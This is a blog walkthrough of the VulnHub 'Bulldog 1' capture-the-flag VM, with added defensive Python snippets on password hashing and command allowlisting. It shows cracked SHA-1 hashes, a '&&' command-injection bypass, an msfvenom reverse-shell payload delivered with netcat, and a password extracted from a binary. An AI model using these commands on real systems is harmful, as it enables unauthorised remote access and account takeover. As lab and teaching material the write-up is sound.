Amonsec

It's all about security.

A simple blog where you can find different things about digital security.

Bulldog 1: CTF walkthrough

Introduction

Name: Bulldog 1
Release date: 28 Aug 2017
Author: Nick Frichette
Series: Bulldog

You can find the virtual machine and the description of the CTF on VulnHub at this address: https://www.vulnhub.com/entry/bulldog-1,211/

Note: this VM doesn't work with VMware Workstation/Fusion, which is why, after a few tries, I decided to install VirtualBox (ew, disgusting).

 

Reconnaissance

First of all, we need to find the IP address of the VM; we can use netdiscover or arp-scan.

root@kali:~/Desktop# arp-scan --localnet
[screenshot: arp-scan output]

Now we can scan the target to find out which services are running inside the virtual machine.

For that, I use the well-known network scanner nmap.

root@kali:~/Desktop# nmap -T5 -A -O --reason -p- 192.168.1.41
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-08 15:14 CEST

Warning: 192.168.1.41 giving up on port because retransmission cap hit (2).
Nmap scan report for pc-240.home (192.168.1.41)
Host is up, received arp-response (0.00061s latency).
Not shown: 65185 closed ports, 347 filtered ports
Reason: 65185 resets and 347 no-responses
PORT     STATE SERVICE REASON         VERSION
23/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|_  256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
80/tcp   open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms pc-240.home (192.168.1.41)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.84 seconds
root@kali:~/Desktop#

Two interesting services are running: a Python HTTP server (WSGIServer), probably serving a Django web application, and an SSH service (OpenSSH 7.2p2, listening on port 23 rather than the usual 22).

Now we will focus our research on the website.

 

Website analysis

The index of the website doesn't give us any useful information, except the name of one employee.
I decided to actively enumerate the target with gobuster, a tool that brute-forces URLs.

[screenshot: gobuster output]

The /admin/ and /dev/ directories sound interesting.

The admin directory is a login form, and after some research I didn't find any vulnerabilities in it, so I moved on to the second directory.

The index of the second directory contains an explanation of the project, a description of how the new team is structured, and a web shell which is, inconveniently, usable only by logged-in users. At this point I knew I had to find credentials in order to log in to the admin panel and then use the web shell. After a few tries without success, I knew I had missed something. Yep, I had missed something called the source code.

The source of the /dev/ index page has more in it than expected: SHA-1 password hashes.

[screenshot: /dev/ page source with the SHA-1 hashes]

I managed to find the plaintext of two of the passwords:

ddf45997a7e18a25ad5f5cf222da64814dd060d5:bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e:bulldoglover

We log in to the admin panel with one of these passwords and can then use the web shell.
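The hashes above are bare, unsalted SHA-1 digests, which is why a dictionary lookup recovered them. As an added example (not code from the original post or from the Bulldog VM), the following contrasts that storage scheme with the salted, iterated format Django's default PBKDF2 hasher produces, and includes a small check that flags the weak form. The iteration count is an assumption; Django's own default changes between releases.

```python
import base64
import hashlib
import hmac
import os

# Constructed sample: one of the digests the page found in the /dev/ page source.
LEAKED_HASH = "ddf45997a7e18a25ad5f5cf222da64814dd060d5"


def looks_like_unsalted_sha1(stored: str) -> bool:
    """A bare hex SHA-1 digest: 40 hex characters, no algorithm or salt prefix.
    Anything matching this in a password store deserves an alert."""
    return len(stored) == 40 and all(c in "0123456789abcdef" for c in stored.lower())


def unsalted_sha1(password: str) -> str:
    """What the vulnerable app did: one fast hash, no salt, so the same password
    always yields the same digest and a precomputed wordlist reverses it."""
    return hashlib.sha1(password.encode()).hexdigest()


def make_password(password: str, iterations: int = 260000, salt: str = "") -> str:
    """Django-style 'pbkdf2_sha256$<iterations>$<salt>$<base64 hash>' string.
    Iteration count is an assumed value, not Django's current default."""
    salt = salt or base64.b64encode(os.urandom(12)).decode().rstrip("=")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt, base64.b64encode(dk).decode())


def check_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt, b64 = stored.split("$", 3)
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), int(iters))
    return hmac.compare_digest(base64.b64encode(dk).decode(), b64)
```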

[screenshot: the web shell]
 

Bypassing the set of available commands

At first look we can use only six commands: ifconfig, ls, echo, pwd, cat and rm. Moreover, we can't use a semicolon.

We can't use a semicolon, but maybe an ampersand will work. And yes, it does, and that allows us to execute any command we want on the target server.

[screenshot: bypassing the command filter with &&]
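The filter fails because it inspects the string for one character (the semicolon) and then hands the whole line to a shell, which still honours &&, |, $() and friends. As an added example (my own code, not the Bulldog application's), here is that naive check next to a hardened version that rejects every shell metacharacter, tokenises with shlex, allowlists argv[0], and runs the result with shell=False. The six-command allowlist is the one the page reports.

```python
import shlex
import subprocess

ALLOWED = {"ifconfig", "ls", "echo", "pwd", "cat", "rm"}  # the six commands the page lists
# Characters that hand control back to a shell; the original filter only rejected ';'.
SHELL_META = set(";&|`$<>(){}\n")


def naive_filter(cmdline: str) -> bool:
    """Behaviour the page describes: first word must be allowed, no semicolon.
    'ls && ...' passes because '&&' is never checked and the line reaches a shell."""
    first = cmdline.strip().split(" ", 1)[0]
    return first in ALLOWED and ";" not in cmdline


def parse_command(cmdline: str) -> list:
    """Hardened check: refuse any metacharacter, tokenise like a shell would,
    then compare argv[0] to the allowlist. Returns the argv list for subprocess."""
    if any(c in SHELL_META for c in cmdline):
        raise ValueError("shell metacharacters are not allowed")
    argv = shlex.split(cmdline)
    if not argv or argv[0] not in ALLOWED:
        raise ValueError("command not in allowlist")
    return argv


def is_allowed(cmdline: str) -> bool:
    """Convenience wrapper: True if parse_command accepts the line."""
    try:
        parse_command(cmdline)
        return True
    except ValueError:
        return False


def run_command(cmdline: str, timeout: float = 5.0) -> str:
    """Execute as an argv list with shell=False, so operators such as && are data,
    not syntax. cat and rm with attacker-chosen paths are still arbitrary file
    read/delete; a real fix would constrain arguments as well as commands."""
    argv = parse_command(cmdline)
    done = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=timeout)
    return done.stdout
```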

We can execute arbitrary commands remotely; it's only a matter of seconds before we get a reverse shell.

We generate a malicious ELF file with msfvenom:

root@kali:~/Desktop# msfvenom --platform linux -p linux/x86/shell_reverse_tcp LPORT=1337 LHOST=192.168.1.107 -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: rshell

We send the malicious file to the target server:

#Web shell
ls && nc -lp 1337 > /tmp/rshell

#Attacker
root@kali:~/Desktop# nc -nvv 192.168.1.41 1337 < rshell
[screenshot: sending rshell with netcat]

We change the permissions of the file:

#Web shell
ls && chmod 777 /tmp/rshell

Finally we execute the reverse shell and then spawn a pseudo-TTY:

#Attacker
root@kali:~/Desktop# nc -lnvvp 1337

#Web shell
ls && /tmp/rshell
[screenshot: reverse shell received]
 

Privilege escalation

We have a low-privilege shell; now our job is to find a way to gain root access to this server.
After a few minutes I found a hidden directory inside the bulldogadmin home folder:

django@bulldog:/home/$ cd bulldogadmin/.hiddenadmindirectory

In this directory we have two things: an ASCII text file and a 64-bit ELF binary:

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ file customPermissionApp
customPermissionApp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c9f2333253302d74eff3da59653f82d28f9eb36f, not stripped
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ file note
note: ASCII text, with very long lines
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$

The first thing I tried with this ELF file was to search for any strings I could find inside the compiled binary, and fortunately for us, the binary contains a password:

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
[..snip..]
SUPERultH
imatePASH
SWORDyouH
CANTget
[..snip..]
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$

The complete password is: SUPERultimatePASSWORDyouCANTget

The password shows up in 8-byte pieces because the program assembles it on the stack with 64-bit immediate moves; the trailing "H" on each line is not part of the password but the 0x48 REX.W prefix byte of the next mov instruction, which strings prints as the letter H.

[screenshot: root shell obtained]